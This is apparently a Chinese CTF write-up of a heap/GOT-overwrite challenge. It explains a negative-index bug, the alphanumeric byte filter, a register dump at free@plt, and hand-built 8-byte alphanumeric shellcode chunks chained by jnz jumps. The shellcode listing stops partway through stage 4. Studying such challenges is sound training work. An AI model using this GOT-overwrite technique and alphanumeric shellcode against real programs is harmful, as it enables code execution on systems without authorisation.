突然发现已经两个月没写过WP了,愧疚- -...

此题也算一道分数很高的题目,主要考察Shellcode的编写。

又是一道题目逻辑很简单的题。

首先提供了三个函数

查看,删除,添加

查看函数:

此函数中readint()使用atoi进行解析,没有检查小于0的情况,造成越解读,可以泄露libc地址(然并卵)

添加函数中一样有这个问题,并且可以任意写,

显然是一道覆盖got表的题,并且没有开启NX保护,就是可以写shellcode。

查看一下check函数

不太清楚__ctype_b_loc是什么check,不过可以fuzz一下。

发现只有如下这些是可以输入的

'''
0x0 0x20 0x30 0x31 0x32 0x33 0x34 0x35 0x36 0x37 0x38 0x39 0x41 0x42 0x43 
0x44 0x45 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d 0x4e 0x4f 0x50 0x51 0x52 
0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5a 0x61 0x62 0x63 0x64 0x65 0x66 0x67 
0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0x76 
0x77 0x78 0x79 0x7a

\x00   0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R 
S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z
'''

而这些机器码构成的汇编就可以做很多事情了,比如参考这个文档给出的汇编指令对应关系

https://wenku.baidu.com/view/bf5227ecaeaad1f346933f86.html

作为其他的限制,shellcode每块不许超过8字节,并且使用strdup建立堆块,也就是说不能有\x00。

根据堆的分配机制,每个堆块分配的大小应该是16字节,并且是连续的,因此可以shellcode链的方法进行跳转,比如使用JNE语句等。

选择覆盖的函数使用free函数,在delete函数时触发,原因是此时在寄存器里会有堆块相关的值。

此时调用free函数时,寄存器的值为:

eax            0x811f018	0x811f018   ;堆块地址
ecx            0x0	0x0
edx            0x0	0x0
ebx            0x0	0x0
esp            0xffd9597c	0xffd9597c
ebp            0xffd959a8	0xffd959a8
esi            0xf76b7000	0xf76b7000
edi            0xf76b7000	0xf76b7000
eip            0x80484e0	0x80484e0 <free@plt>
eflags         0x296	[ PF AF SF IF ]
cs             0x23	0x23
ss             0x2b	0x2b
ds             0x2b	0x2b
es             0x2b	0x2b
fs             0x0	0x0
gs             0x63	0x63

 以此寄存器的值构造shellcode,shellcode块之间使用3个小块填充即可

 

'''
read(0,heap,size)
shellcode 1
push eax  ;P  eax=heap
pop ecx   ;Y   
push ebx  ;S
pop eax   ;X
push 0x7a ;jz
jnz 0x38  ;u8
eax = 0  ebx = 0 ecx = heap edx = 0
shellcode 2 
pop edx   ;Z
dec eax  ;H
xor byte ptr[ecx+0x46],al ;0a5
jnz 0x39
shellcode 3
xor al,0x33  ;4c
xor byte ptr[ecx+0x47],al ;0a5
jnz 0x39
shellcode 4
push 0x33    ;j3
pop eax      ;X
xor al,0x30  ;40

'''+'2L'